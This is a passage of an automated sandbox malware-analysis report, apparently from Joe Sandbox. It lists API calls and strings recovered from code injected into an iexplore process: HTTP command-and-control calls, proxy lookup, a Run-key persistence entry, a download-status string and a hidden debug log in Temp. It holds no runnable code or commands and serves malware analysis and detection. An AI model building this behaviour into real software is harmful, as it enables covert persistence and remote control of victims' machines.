      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    • Send OP_DOWNLOAD_END Data Failed!, xrefs: 00516077
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00513455, Relevance: 13.6, APIs: 9, Instructions: 84
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,0000C6FF,000000FF,00000000,00000000,00000008,?,0000C6FF,?,?,?,005153ED,0000C6FF,00000000), ref: 0051346E
    • ??_U@YAPAXI@Z.MSVCRT ref: 00513484
    • MultiByteToWideChar.KERNEL32(00000000,00000000,0000C6FF,000000FF,00000000,00000001,?,?,?,005153ED,0000C6FF,00000000), ref: 005134A1
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,005153ED,0000C6FF,00000000), ref: 005134B8
    • ??_U@YAPAXI@Z.MSVCRT ref: 005134BE
    • memset.MSVCRT ref: 005134C9
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,0000C6FF,00000001,00000000,00000000,?,005153ED,0000C6FF,00000000), ref: 005134E2
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • ??_V@YAXPAX@Z.MSVCRT ref: 005134F5
    • ??_V@YAXPAX@Z.MSVCRT ref: 005134FD
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00516097, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 72registry
    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,0002001F,?,00000000,?,00000000), ref: 005160E2
    • memset.MSVCRT ref: 00516113
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000), ref: 00516136
    • RegDeleteValueA.ADVAPI32(?,?,?,?,00000000), ref: 0051614A
    • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00516157
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 005160B8
    • IAStorD, xrefs: 005160F0
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F5AB4, Relevance: 12.1, APIs: 8, Instructions: 137
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 0051D254, Relevance: 12.1, APIs: 8, Instructions: 137
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F3F0A, Relevance: 10.6, APIs: 7, Instructions: 97
    APIs
    • _errno.MSVCRT ref: 004F3F4F
    • _errno.MSVCRT ref: 004F3FC6
      • Part of subcall function 004F3287: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 004F3275
    • wctomb.MSVCRT ref: 004F3F74
    • memset.MSVCRT ref: 004F3F8E
    • _errno.MSVCRT ref: 004F3F96
    • memset.MSVCRT ref: 004F3FBE
    • memcpy.MSVCRT ref: 004F3FDA
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 0051B6AD, Relevance: 10.6, APIs: 7, Instructions: 97
    APIs
    • _errno.MSVCRT ref: 0051B6F2
    • _errno.MSVCRT ref: 0051B769
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
    • wctomb.MSVCRT ref: 0051B717
    • memset.MSVCRT ref: 0051B731
    • _errno.MSVCRT ref: 0051B739
    • memset.MSVCRT ref: 0051B761
    • memcpy.MSVCRT ref: 0051B77D
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00518FE7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92
    APIs
    • time.MSVCRT ref: 0051900D
    • srand.MSVCRT ref: 00519014
    • ??2@YAPAXI@Z.MSVCRT ref: 0051901C
    • rand.MSVCRT ref: 00519040
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
    • ??3@YAXPAX@Z.MSVCRT ref: 005190BC
    Strings
    • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_, xrefs: 00518FF8, 00519049
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00514F64, Relevance: 9.3, APIs: 4, Strings: 2, Instructions: 251string
    APIs
    • memset.MSVCRT ref: 00515004
    • memset.MSVCRT ref: 00515062
    • strstr.MSVCRT ref: 005150A5
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A832
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A8AC
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
      • Part of subcall function 005149DD: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00514A11
      • Part of subcall function 005149DD: memcpy.MSVCRT ref: 00514A35
      • Part of subcall function 005149DD: ??2@YAPAXI@Z.MSVCRT ref: 00514A3C
      • Part of subcall function 005149DD: ??3@YAXPAX@Z.MSVCRT ref: 00514A62
      • Part of subcall function 005149DD: WriteFile.KERNEL32(?,?,00000269,?,00000000), ref: 00514A7D
      • Part of subcall function 005149DD: CloseHandle.KERNEL32(?), ref: 00514A86
    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00515220
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 00514D05: memset.MSVCRT ref: 00514D3A
      • Part of subcall function 00514D05: GetLastError.KERNEL32(00000001,?,00000000), ref: 00514D50
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514DBE
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514E2D
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514E87
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514ED7
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F1C8F, Relevance: 9.1, APIs: 6, Instructions: 94
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1CAE
    • memset.MSVCRT ref: 004F1CBE
    • memcpy.MSVCRT ref: 004F1CDA
    • memcpy.MSVCRT ref: 004F1D0B
    • ??3@YAXPAX@Z.MSVCRT ref: 004F1D20
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1D3D
      • Part of subcall function 004F1B6D: __EH_prolog3_GS.LIBCMT ref: 004F1B77
      • Part of subcall function 004F1B6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1BC6
      • Part of subcall function 004F1B6D: memset.MSVCRT ref: 004F1BD6
      • Part of subcall function 004F1B6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1C4A
      • Part of subcall function 004F1B6D: memcpy.MSVCRT ref: 004F1C63
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 005190CF, Relevance: 9.1, APIs: 6, Instructions: 82
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 0051910D
    • memcpy.MSVCRT ref: 0051911A
    • memset.MSVCRT ref: 00519127
    • memset.MSVCRT ref: 00519141
    • memcpy.MSVCRT ref: 00519159
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A2F6
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A322
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A377
    • ??3@YAXPAX@Z.MSVCRT ref: 005191AD
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051207E, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 54
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,00000000,?,00513F1F,00000000,?), ref: 005120EC
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
      • Part of subcall function 0051129D: memset.MSVCRT ref: 00511301
      • Part of subcall function 0051129D: RegQueryValueExW.ADVAPI32(00000000,ProxyEnable,00000000,00000000,?,?,?,?,00000000), ref: 00511345
      • Part of subcall function 0051129D: RegQueryValueExW.ADVAPI32(?,ProxyServer,00000000,00000000,?,?), ref: 00511370
      • Part of subcall function 0051129D: RegCloseKey.ADVAPI32(?), ref: 00511378
      • Part of subcall function 0051129D: ___swprintf_l.LIBCMT ref: 00511398
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113B9
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113D3
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113EE
      • Part of subcall function 0051129D: memset.MSVCRT ref: 00511412
      • Part of subcall function 0051129D: ___swprintf_l.LIBCMT ref: 005114C2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00511231, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 41registry
    APIs
      • Part of subcall function 00511124: memset.MSVCRT ref: 0051115A
      • Part of subcall function 00511124: RegEnumKeyW.ADVAPI32(80000003,00000000,?,00000104), ref: 0051117D
      • Part of subcall function 00511124: wcsncmp.MSVCRT(S-1-5-21,?,00000008), ref: 00511199
      • Part of subcall function 00511124: wcsstr.MSVCRT ref: 005111B1
      • Part of subcall function 00511124: memset.MSVCRT ref: 005111CF
      • Part of subcall function 00511124: RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?), ref: 00511206
    • RegQueryValueExW.ADVAPI32(00000000,AutoConfigURL,00000000,00000000,00000400,00000400,?,00000000), ref: 00511257
    • RegCloseKey.ADVAPI32(00000000), ref: 00511260
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005191BC, Relevance: 7.6, APIs: 5, Instructions: 87
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00519203
    • memset.MSVCRT ref: 00519224
    • memcpy.MSVCRT ref: 0051923B
      • Part of subcall function 00519829: memset.MSVCRT ref: 0051994C
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A2F6
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A322
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A377
    • memcpy.MSVCRT ref: 00519297
    • ??3@YAXPAX@Z.MSVCRT ref: 005192B2
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051B5FC, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 70
    APIs
    • _itoa.MSVCRT ref: 0051B645
    • _snprintf.MSVCRT ref: 0051B683
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F59E2, Relevance: 7.5, APIs: 5, Instructions: 49timethread
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004F5A19
    • GetCurrentProcessId.KERNEL32 ref: 004F5A25
    • GetCurrentThreadId.KERNEL32 ref: 004F5A2D
    • GetTickCount.KERNEL32 ref: 004F5A35
    • QueryPerformanceCounter.KERNEL32(?), ref: 004F5A41
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 0051D182, Relevance: 7.5, APIs: 5, Instructions: 49timethread
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0051D1B9
    • GetCurrentProcessId.KERNEL32 ref: 0051D1C5
    • GetCurrentThreadId.KERNEL32 ref: 0051D1CD
    • GetTickCount.KERNEL32 ref: 0051D1D5
    • QueryPerformanceCounter.KERNEL32(?), ref: 0051D1E1
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00513409, Relevance: 7.5, APIs: 5, Instructions: 37
    APIs
    • WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051341B
    • WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513425
    • WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051342F
    • WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513439
    • WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513442
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00516178, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
    APIs
    • DeleteFileA.KERNEL32(?,00520170,0000002C,005143F8,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,000003EB,?,00000000), ref: 005161AD
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 005161C0
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 00516097: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,0002001F,?,00000000,?,00000000), ref: 005160E2
      • Part of subcall function 00516097: memset.MSVCRT ref: 00516113
      • Part of subcall function 00516097: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000), ref: 00516136
      • Part of subcall function 00516097: RegDeleteValueA.ADVAPI32(?,?,?,?,00000000), ref: 0051614A
      • Part of subcall function 00516097: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00516157
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00512004, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 0051129D: memset.MSVCRT ref: 00511301
      • Part of subcall function 0051129D: RegQueryValueExW.ADVAPI32(00000000,ProxyEnable,00000000,00000000,?,?,?,?,00000000), ref: 00511345
      • Part of subcall function 0051129D: RegQueryValueExW.ADVAPI32(?,ProxyServer,00000000,00000000,?,?), ref: 00511370
      • Part of subcall function 0051129D: RegCloseKey.ADVAPI32(?), ref: 00511378
      • Part of subcall function 0051129D: ___swprintf_l.LIBCMT ref: 00511398
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113B9
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113D3
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113EE
      • Part of subcall function 0051129D: memset.MSVCRT ref: 00511412
      • Part of subcall function 0051129D: ___swprintf_l.LIBCMT ref: 005114C2
    • WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTPS,?,?,?,00513D67,00000000,?,00000000,00000001,00000001), ref: 00512062
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051336C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35
    APIs
    • WinHttpReadData.WINHTTP(?,?,?,?,?,?,?,0051410A,?,00000000,00000004), ref: 0051338C
    • GetLastError.KERNEL32(?,?,0051410A,?,00000000,00000004), ref: 005133A6
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051A476, Relevance: 6.1, APIs: 4, Instructions: 57
    APIs
    • _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
    • memcpy.MSVCRT ref: 0051A4BB
    • memset.MSVCRT ref: 0051A4CC
    • _errno.MSVCRT ref: 0051A4DE
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00515C47, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 44
    APIs
    • memset.MSVCRT ref: 00515C4B
    • memcpy.MSVCRT ref: 00515C72
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    • GetLastError.KERNEL32(00000000,?,000003F2,?), ref: 00515CC0
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
